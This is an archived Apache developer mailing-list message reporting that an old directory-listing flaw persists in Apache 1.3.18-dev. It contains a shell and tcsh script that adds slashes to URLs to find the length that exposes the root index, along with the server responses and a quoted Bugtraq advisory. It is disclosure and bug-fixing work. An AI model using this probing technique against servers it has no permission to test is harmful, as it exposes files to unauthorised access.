httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Martin Kraemer <Martin.Krae...@Fujitsu-Siemens.com>
Subject [SECURITY] Apache-1.3.18
Date Fri, 09 Feb 2001 08:45:35 GMT
I just went through old mails and tested this (see excerpt at end)
on the current apache 1.3.18-dev.

And guess what: The error is still there!!!!!
And I could reproduce it on both FreeBSD-4.2 and BS2000/SVR4.

I have a shell script called GET (linked to HEAD):

--snip--
#!/bin/sh
# on localhost:81, I have a proxy running:
nc localhost 81 <<.
`basename $0` $1 HTTP/1.0

.
--snip--

and I tried this:
---------------
#!/bin/tcsh -f
set x=/
set host=deejai.mch.fsc.net:8080
while ( 1 )
  echo -n /
  GET http://${host}$x | grep //// && break
  set x=$x/
end
while ( 1 )
  echo -n Number of slashes:
  echo -n $x | wc -c
  GET http://${host}$x | grep 403 && break
  set x=$x/
end  
---------------

At 993 '/'s, I still got index.html.en
At 994, I got a directory listing:
---------------
HTTP/1.0 200 OK
Date: Fri, 09 Feb 2001 08:22:10 GMT
Server: Apache/1.3.18-dev (BS2000)
Content-Type: text/html
X-Cache: MISS from deejai2.mch.fsc.net
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
 <HEAD>
  <TITLE>Index of /</TITLE>
 </HEAD>
 <BODY>
<H1>Index of /</H1>
<PRE><IMG SRC="/icons/blank.gif" ALT="     "> <A HREF="?N=D">Name</A>
                   <A HREF="?M=A">Last modified</A>       <A HREF="?S=A">Size</A>
 <A HREF="?D=A">Description</A>
<HR>
<IMG SRC="/icons/back.gif" ALT="[DIR]"> <A HREF="//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
<IMG SRC="/icons/image2.gif" ALT="[IMG]"> <A HREF="apache_pb.gif">apache_pb.gif</A>
          07-Feb-2001 16:05     2k  
<IMG SRC="/icons/text.gif" ALT="[TXT]"> <A HREF="index.html.ca">index.html.ca</A>
          07-Feb-2001 16:05     2k  
<IMG SRC="/icons/text.gif" ALT="[TXT]"> <A HREF="index.html.cz">index.html.cz</A>
          07-Feb-2001 16:05     2k  
<IMG SRC="/icons/text.gif" ALT="[TXT]"> <A HREF="index.html.de">index.html.de</A>
          07-Feb-2001 16:05     2k  
....
---------------

And at 997 and beyond, I got this:

---------------
HTTP/1.0 403 Forbidden
Date: Fri, 09 Feb 2001 08:25:06 GMT
Server: Apache/1.3.18-dev (BS2000)
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from deejai2.mch.fsc.net
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////[truncated
by my editor]
on this server.<P>
<HR>
<ADDRESS>Apache/1.3.18-dev Server at dcWWW.mch.fsc.net Port 8080</ADDRESS>
</BODY></HTML>
---------------

   Martin

> On Wed, 31 May 2000, Marc Slemko wrote:
> 
> > FYI.
> > 
> > It may or may not apply to Apache itself on Win32, and may or may not be
> > fixed in current versions.  What is happening here is almost certainly
> > that it tries to look for index.html, etc. and the error code isn't
> > properly interpreted to mean "that is too long, so bail".
> > 
> > ---------- Forwarded message ----------
> > Date: Wed, 31 May 2000 18:34:30 -0000
> > From: Marek Roy <marek_roy@HOTMAIL.COM>
> > To: BUGTRAQ@SECURITYFOCUS.COM
> > Subject: IBM HTTP SERVER / APACHE
> > 
> > I haven't seen any advisories for IBM HTTP SERVER running 
> > Apache.
> > 
> > There is a crucial number of "/" (forward slash) you can 
> > use to retrieve the contents of the root directory of this 
> > particular Web Server.  Using this vulnerability, you can 
> > retrieve any files or scripts running from that directory 
> > and sub-directories.
> > 
> > The number of "/" used to reproduce this can be different 
> > from one server to another.  I don't have enough time to do 
> > more testing.  However, feel free to add some more info to 
> > this quick advisory.
> > 
> > You can get a trial copy at:
> > 
> > http://www-
> > 4.ibm.com/software/webservers/httpservers/download.html#v136
> > 
> > ====
> > 
> > Vulnerable:
> > Server: IBM_HTTP_Server/1.3.6.2 Apache/1.3.7-dev (Win32)
> > 
> > Not Vulnerable:
> > Server: IBM_HTTP_Server/1.3.6.2 Apache/1.3.7-dev (Unix)
> > 
> > ====
> > 
> > If you send a GET request of 210 "/", you get:
> > The actual Web Page.
> > ----
> > If you send a GET request of 211 "/", you get:
> > Index of /
> > -----
> > If you send a GET request of 212 "/", you get:
> > 
> > Forbidden
> > You don't have permission to access
> > "/" x 212 on this server.
> > 
> > 
> > Marek Roy
-- 
<Martin.Kraemer@Fujitsu-Siemens.com>    |       Fujitsu Siemens
       <martin@apache.org>              |   81730  Munich,  Germany

Mime
View raw message